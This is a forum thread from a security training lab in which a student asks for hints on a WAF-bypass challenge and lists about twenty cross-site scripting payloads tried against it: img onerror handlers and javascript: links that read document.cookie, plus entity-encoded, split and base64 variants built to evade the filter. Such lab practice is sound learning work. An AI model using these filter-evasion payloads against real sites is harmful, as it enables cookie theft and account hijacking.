Bypassing Web Application Firewalls 1.3 Challenge Exercise

I’m trying to bypass the WAF in order to capture the flag. I’ve tested all “Guided Exercise” commands. The word “javascript” is blocked by the WAF. I also tried to do something like “jaascrpt” or “ja vascri pt” and got nothing. I was wondering if someone could give me a hint, so I can get to the point!
Thanks in advance!

Hey there - this isn’t really my area of expertise, but working backwards from the instructor’s solution notes, I’d say you don’t necessarily need to use that javascript directive from Part 4 to get the flag.

Broadly speaking, I would recommend:

Seeing which meta characters and special characters work.
Seeing which basic HTML elements work.
Seeing if any attributes work (i.e. src=, data=).
Reviewing the core concept lesson for additional techniques.

It also helps to come to this challenge later. All challenge exercises are optional, and you may benefit from completing additional lab work from other parts of the path first.

I tried several possible approaches (such as character codes, using decimal, etc.) to bypass it, but none of them worked. I’m just curious what the solution was that Cybrary expected me to find.

You are trying to steal the cookie. One hint I can give is that what may not work in the Guided Exercises might just work in the Challenge.

Please write a list of the things you have tried :slight_smile: I’ll edit them if I think they give too much away :slight_smile:

Here is the list of things I’ve tried so far:

asdf>"'<img src=x>
asdf>"'<img src=x onerror=alert(1234);>
asdf>"'<img src=x onerror=console.log(document.cookie);>
asdf>"'<img src=x onerror=document.write(document.cookie);>
asdf>"'<img src=x onerror=prompt(document.cookie);> 
asdf>"'<img src=x onaaaaa= >
asdf>"'<a href="">CLICK</a>
asdf>"'<a href="javascript:aaa">CLICK</a>
asdf>"'<a href="javascript:prompt()">CLICK</a>
asdf>"'<a href="javascript:prompt(document.cookie)">CLICK</a>
asdf>"'<a href="jav&#97;script:prompt(document.cookie)">CLICK</a>
asdf>"'<a href="jav&#0Aascript:prompt(document.cookie)">CLICK</a>
asdf>"'<a href="jav   ascript:pro   mpt(document.cookie)">CLICK</a>
asdf>"'<a href="jav*ascript:pro*mpt(document.cookie)">CLICK</a>
asdf>"'<a href=""jav"+"ascript":prompt(document.cookie)">CLICK</a>
asdf>"'<a href="top["jav"+"ascript]:prompt(document.cookie)">CLICK</a>
asdf>"'<a href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;:prompt(document.cookie)">CLICK</a>
asdf>"'<a href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#112;&#114;&#111;&#109;&#112;&#116;&#40;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#111;&#111;&#107;&#105;&#101;&#41;">CLICK</a>
asdf>"'<a href="amF2YXNjcmlwdDpwcm9tcHQoZG9jdW1lbnQuY29va2llKQ==">CLICK</a>

and more.
I also tried in both the Guided and Challenge Exercise labs, but nothing changed.
Thanks for your time!

I sent you a private message :slight_smile:

I thought I should use a combination of HTML and JavaScript code somehow. I don’t know if it works, by the way.
Thank you.